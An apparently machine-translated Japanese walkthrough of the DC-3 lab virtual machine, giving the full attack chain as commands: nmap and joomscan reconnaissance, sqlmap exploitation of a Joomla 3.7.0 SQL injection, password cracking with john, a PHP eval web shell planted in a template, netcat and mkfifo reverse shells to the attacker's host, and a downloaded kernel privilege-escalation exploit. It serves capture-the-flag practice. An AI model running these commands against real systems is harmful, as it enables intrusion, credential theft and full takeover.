対象マシンリンク: https://pan.baidu.com/s/1Q3OuzI8mr-0G6AEagw_XBg
抽出コード: 0na8
まずローカル マシンの IP アドレスを確認します kali: 192.168.159.145
ifconfig
は nmap を使用してターゲット マシンの IP をスキャンします
nmap -sP 192.168.159.1/24
ターゲット マシンの MAC アドレスを確認します
仮想マシンの設定を開き、ネットワーク アダプター -
ターゲット マシンの MAC アドレスに基づく高度な一致 nmap のスキャン結果により、ターゲット マシンの IP が 192.168.159.141 であることが確認されます。
nmap を使用してフル スキャン
nmap -A 192.168.159.141 -p 1-65535を実行する
と、ポート 80 が開いていることがわかります。ブラウザを使用してアクセスしてみてください。
指紋認証を使用する
whatweb http://192.168.159.141/
結果は、ターゲット マシンは Apache プラットフォームを使用し、サーバーは Ubuntu です
joomscan を使用して
joomscan --url http://192.168.159.141/をスキャン
します。結果は、Web サイトの背景がスキャンされたことを示します。ブラウザを使用してアクセスします。
http://192.168.159.141/administrator/
Web サイトの背景は joomla 3.7.0 テンプレートです。
テンプレートの脆弱性
searchsploit joomla 3.7.0 を見つけて、
結果を現在のディレクトリにコピーし、
cp /usr/share/exploitdb/exploits/php/webapps/42033.txt joomalv370_sqli を確認します。 txt
cat joomalv370_sqli.txt
インジェクションポイントが見つかりました
。sqlmap を使用してデータベースライブラリ名をリストします。
sqlmap -u “http://192.168.159.141/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml” --risk=3 --level=5 --random-agent --dbs -p list [fullordering]
joomladb のすべてのテーブル名をリストする
sqlmap -u “http://192.168.159.141/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml” --risk=3 --level=5 - - random-agent -D "joomladb" --tables -p list[fullordering]
#_users テーブルが見つかりました
ユーザー テーブルのフィールド タイプをリストします
sqlmap -u "http://192.168.159.141/index.php?option=com_fields&view=fields&layout = modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" --columns -p list[fullordering] john ツールを使用してアカウントのパスワードを一覧表示
する
クラックパスワード
vim joom.txt
ジョン ジョーム。txt の
結果は、パスワードが snoopy であり
、バックグラウンドで検索されることを示しています。
彼は、root 権限を取得する DC-3 戦闘のターゲットは 1 つだけであることを教えてくれました。
このディレクトリには beez3 テンプレートがあります。
入力すると、ファイルを編集できる新しいファイルがあることがわかりました。トロイの木馬のアップロードを検討してください.
トロイの木馬をアップロードするには、まず現在のファイルを見つける必要があります ディレクトリ
ディレクトリは http://192.168.159.141/templates/beez3/html/ です
先ほどのページに戻り、新しいファイルをクリックして、
以下に php ファイルを作成しますhtml
ファイルを編集します
。トロイの木馬という単語が間違っています。@eval($_REQUEST[ '123']) である必要があります。
このファイルにアクセスしてみてください。実行は成功しました
。Ant Sword を使用して接続し、
右クリックして接続して開きます仮想端末、
コマンドを使用して基本情報を表示する
リバウンド シェル、kali ローカル モニタリング
nc -lvvp 2333
Ant Sword 仮想端末
nc -e /bin/bash 192.168.159.145 2333
-e パラメータは使用できません
コマンド
rm /tmpを実行します/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.159.145 2333 >/tmp/f は現在のターゲットマシンシステムが Ubuntu 16.04 searchsploit ubuntu 16.04 コピーファイルであることを知ること
が
でき
ます
cp /usr/share/exploitdb/exploits/linux/local/39772.txt ubuntu1604_shell.txt
コンピューターは海外の Web サイトにアクセスできないため、ネットワーク ディスクを使用して exp
EXP リソース
リンクをダウンロードします: https://pan.baidu.com/s /1AeuJrP- T6elka5aZP9KL9g
抽出コード: 0fkw
ここで圧縮パッケージを解凍しないように注意してください
kali の apache2 サービスを開始します: service apache2 start
ファイルを Web ディレクトリにコピーします: cp -r 39772 /var/www/html
コマンドを実行します wget http://192.168.159.145/ターゲット マシン上の 39772 zip
unzip 39772.zip
cd 39772
tar -xvf extend.tar
cd ebpf_mapfd_doubleput_exploit
./compile.sh
./doubleput
